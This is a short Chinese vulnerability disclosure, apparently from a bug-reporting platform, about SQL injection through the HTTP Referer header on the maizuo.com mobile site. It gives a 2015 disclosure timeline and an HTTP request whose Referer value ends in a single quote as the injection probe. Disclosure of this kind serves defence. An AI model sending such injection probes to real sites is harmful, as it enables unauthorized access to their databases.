賣座網一處SQL注射(Http Referer sqlinjection)

漏洞做者： 豬豬俠

漏洞詳情

披露狀態：

2015-01-13： 細節已通知廠商而且等待廠商處理中
2015-01-14： 廠商已經確認，細節僅向廠商公開
2015-01-24： 細節向核心白帽子及相關領域專家公開
2015-02-03： 細節向普通白帽子公開
2015-02-13： 細節向實習白帽子公開
2015-02-27： 細節向公衆公開

code 區域

GET /?cityId=13&cityName=%E5%B9%BF%E5%B7%9E HTTP/1.1

Host: m.maizuo.com

Proxy-Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Referer: http://m.maizuo.com/city'

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: